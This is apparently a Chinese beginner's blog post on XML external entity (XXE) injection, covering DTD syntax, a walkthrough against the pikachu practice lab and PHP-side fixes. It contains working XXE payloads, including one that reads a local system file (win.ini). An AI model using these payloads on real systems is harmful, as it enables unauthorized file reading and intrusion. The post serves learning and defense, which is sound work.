XML的XXE漏洞详解(小白刚入门的第二天,大佬们轻点喷)

最新推荐文章于 2025-04-26 22:48:17 发布
最新推荐文章于 2025-04-26 22:48:17 发布
阅读量621 收藏 9
点赞数 10
文章标签: xml 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/N_qing/article/details/144278408
版权

XXE产生的原因

XXE是XML外部实体注入漏洞,发生在应用程序解析XML输入时,没有禁止外部实体加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、DDOS攻击等危害,简单地说就是用户传入的XML被当成实体执行了。

检测

在HTTP的Request的报文出现以下请求报文表明是用XML传输的

Content-type:text/xml application/xml

DTD

DTD(文档类型定义)存在XXE的地方, 可以被声明在XML的文档中,也可以作为一个外部的引用。

<!DOCTYPE 根元素 [定义内容]> 内部DTD文档
<!DOCTYPE 根元素 [SYSTEM] "DTD文件路径">外部DTD文档
<!DOCTYPE 根元素 [SYSTEM] "DTD文件路径"[定义内容]内外结合DTD文档

内部实体几乎不会用到,这里就不做演示了

外部实体

<!ENTITY 实体 SYSTEM "URL">
 <?XML version="1.0"?>
<!DOCTYPE din [
    <!ENTITY root SYSTEM "edn.xml">
]>
<din>&root;</bin>

实战

靶场:pikachu

有回显

先测试一下是否有xxe漏洞

bp抓包

 可以看到传输方式为xml存在xxe漏洞 

构造payload语句

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker "ESHLkangi">
]>
<name>&hacker;</name>

   

有回显

修改xml语句

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///c:/windows/win.ini">
]>
<x>&f;</x>

无回显

无回显又称为blind xxe,可以使用带外数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容以http请求的方式发送到接受数据的服务器(因为这一块比较难,对于我来说,看了几篇文章还是没能理解,抱歉了师傅们,无回显这一块暂时先不更新了,精进了在补一篇,哪位佬也可以分享下,不胜感激)

导致xxe漏洞的关键函数

simplexml_import_dom

该函数可以把DOM节点转化为simplexmlelement对象

libxml_disable_entity_loader(false)

这个函数的意思是允许php加载外部实体,这也是xxe漏洞产生的原因,在现实的生产环境中把false改为true

loadxml

该函数可以把输入的字符串转化为DOMDocument对象

XXE漏洞的修复与防御

配置xml处理器使用静态DTD,不允许XML中含有任何自己声明的DTD,设置相应的属性值为false

1.使用开发语言禁用外部实体

2.过滤用户提交的敏感数据

N_qing
关注
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XMLXXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
xmlxxe漏洞
m0_48907714的博客
04-25 4287
XXE漏洞 XML概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 XML与HTML的主要差异 XML被设计为传输和存储数据,其焦
XXE&XML漏洞详解
剁椒鱼头没剁椒的博客
12-29 4489
这里我对XML也不是太懂,无法对其进行解释,同时也怕解释出现错误,使其误导,这里我发一下参考链接。XML教程文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于XML文档中(内部引用),也可作为一个外部引用。内部声明DTD: 引用外部DTD: DTD文档中有很多重要的关键字如下:DOCTYPE(DTD的声明)
深入了解 Web 安全漏洞——从 XXE 攻击到文件上传漏洞 
m0_57836225的博客
10-13 311
或者在数据库注入的情况下,如果数据库中存储了 XML 数据,攻击者通过 SQL 注入等漏洞修改数据库中的 XML 内容,当服务器读取和处理这些 XML 数据时,就可能触发 XXE 攻击。开发人员和安全专家必须高度重视这些漏洞,采取有效的安全措施,如严格的输入验证、文件类型检查、限制外部实体引用等,以确保 Web 应用的安全稳定运行,保护用户的信息和权益。又或者在文件上传功能中,若应用程序允许用户上传 XML 文件,攻击者上传包含恶意外部实体引用的 XML 文件,就可能导致服务器在解析时出现安全问题。
Vulhub-php_xxe
Mccc_li的博客
04-16 904
test
CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!
Python_paipai的博客
12-11 1570
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
2024年最新一文带你掌握网络安全入门的所有知识点_网络攻防入门(1),2024年最新2024年大厂网络安全岗面试必问
2401_84281748的博客
05-06 876
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。命令执行案例详解(命令连接符||、|、&&、&、;
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1040
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
《MetaSploit渗透测试魔鬼训练营》之WEB应用渗透技术_web漏洞渗透实验利用metasploit
2401_84572928的博客
04-26 363
PASS_FILE 虽然没有要求,但是加上的话肯定是要快一些的,同样USER_FILE也是,这两个是单独的,还有USERPASS_FILE是用户密码本,每个一行,空格分隔。Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。缺乏传输层保护:明文传输,没有使用SSL/TLS进行加密。
渗透测试 ( 1 ) --- 相关术语、必备 工具、导航、全流程总结、入侵网站思路
热门推荐
freeking101的博客
07-02 3万+
在学习某项技能的时,要用最快的时间摸索清楚最少必要知识 (MAKE)都有哪些? 然后迅速地掌握它们,这样就实现了 "快速入门",然后就可以开始动手实践,然后在实践中验证理论、加深理解,同时继续扩展学习。而学习黑客也是同样的道理,对于新手小白的第一课应该是以掌握基础的安全工具为主,这样在学习的同时可以进行实践,验证所学的知识,同时加以扩展,这样学习效率会大大提升.........................................................
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
XXE漏洞详解
weixin_56714714的博客
07-25 8071
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML
Flowable7.x学习笔记(十四)查看部署流程Bpmn2.0-xml
持续学习ing
04-25 1029
查看部署流程Bpmn2.0-xml
深入XMLHttpRequest与Promise:从原生请求到封装axios实战
2301_79940491的博客
04-24 744
本文系统讲解原生XMLHttpRequest的核心用法,包括异步请求、参数传递和响应处理,并剖析Promise如何解决回调地狱问题。通过封装简易axios的完整过程(支持GET/POST、参数处理、错误拦截),结合天气预报案例,演示如何将底层API转化为易用的异步请求工具,帮助开发者深入理解网络请求原理并掌握工程化封装技巧。
MyBatis XML 配置完整示例(含所有核心配置项)
最新发布
爱的叹息的专栏
04-26 519
MyBatis XML 配置完整示例(含所有核心配置项)
XML内容解析成实体类
北极的企鹅
04-22 286
XML内容解析成实体类
Java 调用webservice接口输出xml自动转义
chinalog的专栏
04-24 425
在Java调用WebService接口输出XML时,若出现自动转义问题,需根据XML生成方式和工具特性针对性处理。
Python - 爬虫-网页解析数据-库lxml(支持XPath)
MinggeQingchun的博客
04-24 1091
是 Python 的第三方解析库,完全使用 Python 语言编写,它对 Xpath 表达式提供了良好的支持,支持HTML和XML的解析,支持XPath解析方式,而且解析效率非常高,全称,即XML路径语言,它是一门在XML文档中查找信息的语言,它最初是用来搜寻XML文档的,但是它同样适用于HTML文档的搜索。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值